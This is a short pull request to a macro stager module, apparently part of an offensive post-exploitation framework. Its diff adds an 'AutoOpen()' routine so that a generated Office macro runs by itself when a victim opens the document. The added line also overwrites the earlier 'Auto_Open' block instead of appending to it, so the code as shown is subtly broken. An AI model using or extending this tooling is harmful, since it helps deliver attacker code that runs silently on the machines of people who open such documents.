### PR TITLE
Corrected a typo preventing the autorunning macro from automatically running

### DIFF
--- a/lib/stagers/macro.py
+++ b/lib/stagers/macro.py
@@ -82,6 +82,10 @@ class Stager:
             macro = "Sub Auto_Open()\n"
             macro += "\tDebugging\n"
             macro += "End Sub\n\n"
+            macro = "Sub AutoOpen()\n"
+            macro += "\tDebugging\n"
+            macro += "End Sub\n\n"
+
             macro += "Sub Document_Open()\n"
             macro += "\tDebugging\n"
             macro += "End Sub\n\n"


### PR DESCRIPTION
Renamed Auto_Open() to AutoOpen() in the macro stager
https://support.microsoft.com/en-us/kb/286310
